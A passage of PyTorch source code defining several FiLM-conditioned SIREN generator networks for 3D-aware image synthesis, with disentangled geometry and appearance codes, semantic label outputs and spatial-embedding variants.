self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.dir_mapping_network = nn.Sequential( nn.Linear(3, 256), nn.Linear(256, 32) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) # n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output
return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: why is this transform applied?
input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) # ray_directions = self.dir_mapping_network(ray_directions)
x = self.color_layer_pre(x) rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1)
class SPATIALSIRENAUGDISENTANGLE(nn.Module): """Same architecture as SPATIALSIRENDISENTANGLE but has an augmented color branch and a narrower density feature branch""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_pre = nn.Sequential( nn.Linear(hidden_dim, 3), ) # self.color_layer_sine = FiLMLayer(hidden_dim + 32, hidden_dim) # ray_direction dim: 3 --> 32
self.color_layer_sine = nn.ModuleList([ FiLMLayer(3 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: why is this transform applied?
input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) x = self.color_layer_pre(x) rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1)
class RESSIRENDISENTANGLE(nn.Module): """ Same architecture as SIRENDISENTANGLE but uses a residual architecture according to http://gvv.mpi-inf.mpg.de/projects/i3DMM/ """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.res_coord_layer = nn.Linear(hidden_dim, 3) self.density_layer_linear = nn.Sequential( nn.Linear(3, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 1) ) self.color_layer_pre = nn.Sequential(nn.Linear(3, hidden_dim)) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) # self.dir_mapping_network = nn.Sequential( # nn.Linear(3, 256), # nn.Linear(256, 32) # )
self.network.apply(frequency_init(25)) self.density_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) # n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output
return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: why is this transform applied?
input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) coords_res = self.res_coord_layer(x) input = input + coords_res sigma = self.density_layer_linear(input) # ray_directions = self.dir_mapping_network(ray_directions)
rbg = self.color_layer_pre(input) rbg = torch.cat([ray_directions, rbg], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1)
class SPATIALSIRENSEMANTICDISENTANGLE(nn.Module): """Same architecture as TALLSIREN but uses two latent codes and renders semantic maps""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim - 4)) # output_dim = seg_channel + rgb_channel + density_channel
self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.color_layer_sine[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: why is this transform applied?
input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) start += self.hidden_dim end += self.hidden_dim labels = self.label_layer_linear(x) # rbg = torch.cat([ray_directions, input, labels], dim=-1)
rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1)
class SIRENBASELINESEMANTICDISENTANGLE(nn.Module): """Same architecture as the TALLSIREN baseline but uses two latent codes and renders semantic maps""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim - 4)) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
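# Output layout is [labels, rgb, sigma]: the label head is a plain linear stack off
# the shared trunk with (output_dim - 4) channels, since 3 output channels are RGB
# and 1 is density.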
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1)
class SIRENBASELINESEMANTICDISENTANGLE_debug(nn.Module): """Same architecture as SIRENBASELINESEMANTICDISENTANGLE except that it applies a sigmoid to the label output""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 19)) # 19 semantic labels
self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance.
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = torch.sigmoid(self.label_layer_linear(x)) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENSEMANTICHD(nn.Module): """Same architecture as SPATIALSIRENSEMANTIC but on a high resolution""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_sine = FiLMLayer(hidden_dim, hidden_dim) self.label_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 2)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.label_layer_sine.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. 
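# NOTE: in this HD variant both the label and color heads emit 64-channel features
# for a downstream neural renderer; the "19 semantic labels" comment above is
# inherited from the low-resolution variant, where the label head is 19-dimensional.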
def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) start += self.hidden_dim end += self.hidden_dim sigma = self.final_layer(x) labels = self.label_layer_sine(x, frequencies[..., start:end], phase_shifts[..., start:end]) # TODO: w. / w.o softmax activation on label labels = self.label_layer_linear(labels) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = self.color_layer_linear(rbg) # rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class EmbeddingPiGAN128SEMANTICDISENTANGLE(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details.""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(32 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. 
self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) x = torch.cat([shared_features, input], -1) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. 
self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1,32,64,64,64)*0.1) class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE_DIM_96(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1,32,96,96,96)*0.1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. 
